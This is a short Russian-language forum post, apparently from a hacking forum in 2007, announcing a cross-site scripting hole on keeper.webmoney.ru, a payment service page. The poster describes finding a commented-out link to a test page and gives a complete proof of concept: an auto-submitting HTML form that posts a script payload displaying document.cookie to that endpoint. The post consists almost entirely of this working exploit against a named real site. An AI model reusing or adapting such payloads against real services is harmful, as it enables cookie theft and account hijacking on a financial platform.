Показать сообщение отдельно

XSS на keeper.webmoney.ru ;)
  #1  
Старый 04.02.2007, 22:39
omg!
Banned
Регистрация: 30.12.2006
Сообщений: 40
Провел на форуме:
484093

Репутация: 11
По умолчанию XSS на keeper.webmoney.ru ;)

нашел случайно - в страничках кипера увидел закоментенный блок с линком на тестовую страницу:

<form action="http://keeper.webmoney.ru/docs/test.asp" METHOD="post">
<input type=hidden name='XSS' value='<script>alert(document.cookie + "\nXSS by KPbIC(myiworm@mail.ru)")</script>'>
</form>
<script>document.forms[0].submit();</script>